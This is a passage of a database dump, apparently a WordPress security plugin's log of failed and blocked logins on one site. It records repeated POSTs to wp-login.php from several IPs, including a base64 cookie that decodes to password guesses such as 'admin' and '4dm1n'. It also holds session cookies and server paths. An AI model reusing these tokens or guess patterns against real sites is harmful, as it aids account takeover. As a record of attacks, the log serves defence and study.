";i:1744748171;}}','185.104.44.61',0,'2025-04-16 01:46:13','1970-01-01 00:00:00'),(93677,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"78\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:254:\"_uid=rB8jg2f+v1oQYhaTAwRpAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=LgagfzOYeefds1FrsrCyOGESessXp6cH; PHPSESSID=af822d4118ba512ce889070261fd84ba; swpm_session=da3ac33a80ffeefa1763782980064971; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49549\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.201.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"78\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744748388.3883231;s:12:\"REQUEST_TIME\";i:1744748388;}}','128.199.201.0',1,'2025-04-16 01:49:49','2025-04-16 01:59:56'),(93678,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"78\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:288:\"_uid=rB8jg2f+v1oQYhaTAwRpAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=LgagfzOYeefds1FrsrCyOGESessXp6cH; PHPSESSID=af822d4118ba512ce889070261fd84ba; swpm_session=da3ac33a80ffeefa1763782980064971; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7YWRtaW4%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49549\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.201.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"78\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744748390.0702059;s:12:\"REQUEST_TIME\";i:1744748390;}}','128.199.201.0',1,'2025-04-16 01:49:51','2025-04-16 01:59:56'),(93679,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"78\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:288:\"_uid=rB8jg2f+v1oQYhaTAwRpAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=LgagfzOYeefds1FrsrCyOGESessXp6cH; PHPSESSID=af822d4118ba512ce889070261fd84ba; swpm_session=da3ac33a80ffeefa1763782980064971; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7QWRtaW4%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49549\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.201.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"78\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744748391.7085569;s:12:\"REQUEST_TIME\";i:1744748391;}}','128.199.201.0',1,'2025-04-16 01:49:53','2025-04-16 01:59:56'),(93680,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"78\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:288:\"_uid=rB8jg2f+v1oQYhaTAwRpAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=LgagfzOYeefds1FrsrCyOGESessXp6cH; PHPSESSID=af822d4118ba512ce889070261fd84ba; swpm_session=da3ac33a80ffeefa1763782980064971; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7NGRtMW4%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49549\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.201.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"78\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744748393.3537719;s:12:\"REQUEST_TIME\";i:1744748393;}}','128.199.201.0',1,'2025-04-16 01:49:54','2025-04-16 01:59:56'),(93681,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"78\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:288:\"_uid=rB8jg2f+v1oQYhaTAwRpAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=LgagfzOYeefds1FrsrCyOGESessXp6cH; PHPSESSID=af822d4118ba512ce889070261fd84ba; swpm_session=da3ac33a80ffeefa1763782980064971; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7QGRtaW4%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49549\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.201.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"78\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744748395.0087061;s:12:\"REQUEST_TIME\";i:1744748395;}}','128.199.201.0',1,'2025-04-16 01:49:56','2025-04-16 01:59:56'),(93682,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+wTwQYhaTAwWQAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42950\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.120.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744748861.73103;s:12:\"REQUEST_TIME\";i:1744748861;}}','176.126.120.71',0,'2025-04-16 01:57:43','1970-01-01 00:00:00'),(93683,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+w+oQYhaTAwbLAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34924\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.140.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744749546.923583;s:12:\"REQUEST_TIME\";i:1744749546;}}','81.177.140.54',0,'2025-04-16 02:09:08','1970-01-01 00:00:00'),(93684,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+xpcQYhaTAwfpAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56044\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.54.175\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744750232.0246699;s:12:\"REQUEST_TIME\";i:1744750232;}}','188.165.54.175',0,'2025-04-16 02:20:33','1970-01-01 00:00:00'),(93685,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+yUMQYhaTAwkRAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37744\";s:11:\"REMOTE_ADDR\";s:13:\"209.17.114.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744750916.1078761;s:12:\"REQUEST_TIME\";i:1744750916;}}','209.17.114.78',0,'2025-04-16 02:31:57','1970-01-01 00:00:00'),(93686,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+y+cQYhaTAwqbAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55102\";s:11:\"REMOTE_ADDR\";s:12:\"209.74.67.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_F